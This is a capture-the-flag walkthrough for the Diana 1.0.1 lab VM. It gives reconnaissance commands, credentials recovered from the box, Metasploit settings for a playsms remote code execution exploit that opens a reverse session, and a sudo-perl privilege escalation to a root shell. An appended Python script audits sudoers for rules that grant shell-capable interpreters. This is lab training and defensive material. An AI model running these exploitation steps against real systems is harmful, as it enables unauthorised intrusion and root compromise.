Diana: 1.0.1 CTF Walkthrough
Hi friends, welcome to hackxsploit. Here is the complete walkthrough of the Diana:1.0.1 CTF. It is a beginner-level CTF. Download it from here. This is a Boot2Root CTF VM. I hope you enjoy it.
So let's crack it.
Objective: Get root access on the system and capture flag.txt
Attacking machine: Linux kali 4.17.0-kali1-amd64
Target machine: Diana 1.0.1, IP: 172.16.166.137
**It is recommended to run nmap, dirb and nikto first to scan the IP.**
--------------------------------------------------------------------------------------------------------------------------------
Let's start by getting the IP of the Diana VM with this command:
# arp-scan -l
I have got my target IP: 172.16.166.137
Now scan the IP with nmap:
# nmap 172.16.166.137 -sSCV
Now scan the IP with dirb:
# dirb http://172.16.166.137
Now we see that port 80 is open, so we browse to our IP in a browser.
Now open http://172.16.166.137/robots.txt
Here some directories are listed.
Go to http://172.16.166.137/nothing/
It shows "go back", but the real game starts from here.
Open the page source of this page and we see a password list.
Copy this password list somewhere else in a text editor. (Remember this :-)
When we used dirb in the 3rd step, it showed one more directory after scanning.
So open this directory: http://172.16.166.137/secure/
We find a file named "backup.zip".
Download and open it. Its password is "freedom". Here we see an mp3 file, but don't be confused: open this mp3 file with a text editor.
It shows the username and a directory where we can log in.
Go to http://172.16.166.137/SecreTSMSgatwayLogin
A login page opens.
Here the login ID is: touhid
The password is: diana (from the password list that we copied earlier)
Here we see that the CMS is "playsms", which is vulnerable and gives remote code execution.
So open Metasploit and search for "playsms":
msf> search playsms
msf> use exploit/multi/http/playsms_filename_exec
msf> options
msf> set RHOST 172.16.166.137
msf> set TARGETURI /SecreTSMSgatwayLogin
msf> set USERNAME touhid
msf> set PASSWORD diana
msf> set LHOST 172.16.166.163 (this is my local IP)
msf> exploit
Wow... we got a meterpreter session.
Type shell to drop into a shell.
Here we can't get to root directly, so type this command:
python -c 'import pty; pty.spawn("/bin/sh")'
*** (this is used to spawn a TTY shell)
After that, type these commands:
sudo perl -e 'exec "/bin/sh";'
cd /root
cat flag.txt
Finally we got our flag.
Give your feedback and comments.
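The root step above only works because the box lets the web user run perl through sudo. Below is an added audit example, not part of the original walkthrough, that parses `sudo -l` output and flags shell-capable interpreters granted as root so the misconfiguration can be fixed; the sample output is constructed, not captured from the VM.

```python
"""Flag sudoers rules that hand a low-privileged user an interpreter as root.
This is the class of misconfiguration the Diana box relies on (sudo perl -> root).
Added example for this walkthrough; the `sudo -l` text below is constructed."""
import re

# Binaries that can spawn a shell or run arbitrary code when invoked via sudo.
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "sh", "bash", "dash",
    "vi", "vim", "less", "more", "find", "awk", "env",
}

# Constructed sample of what `sudo -l` could print on a host like Diana.
SAMPLE_SUDO_L = """\
Matching Defaults entries for touhid on diana:
    env_reset, mail_badpass, secure_path=/usr/sbin:/usr/bin:/sbin:/bin

User touhid may run the following commands on diana:
    (ALL : ALL) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
    (ALL) NOPASSWD: /usr/bin/python3
"""

# A rule line looks like: "(runas) TAG: cmd1, cmd2" with optional tags.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def risky_sudo_rules(sudo_l_output: str):
    """Return (runas, tags, command) for every rule granting a shell-capable binary."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines and headers are not rules
        tags = m.group("tags").strip()
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if binary in SHELL_CAPABLE:
                findings.append((m.group("runas"), tags, cmd))
    return findings


if __name__ == "__main__":
    for runas, tags, cmd in risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"RISK: ({runas}) {tags} {cmd} - interpreter can spawn a root shell")
```

Run it against the real `sudo -l` output of a service account; any hit should be removed from sudoers or restricted to a wrapper that cannot reach a shell.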
Prince Raj
princelucideus121@gmail.com
https://www.linkedin.com/in/rajprince/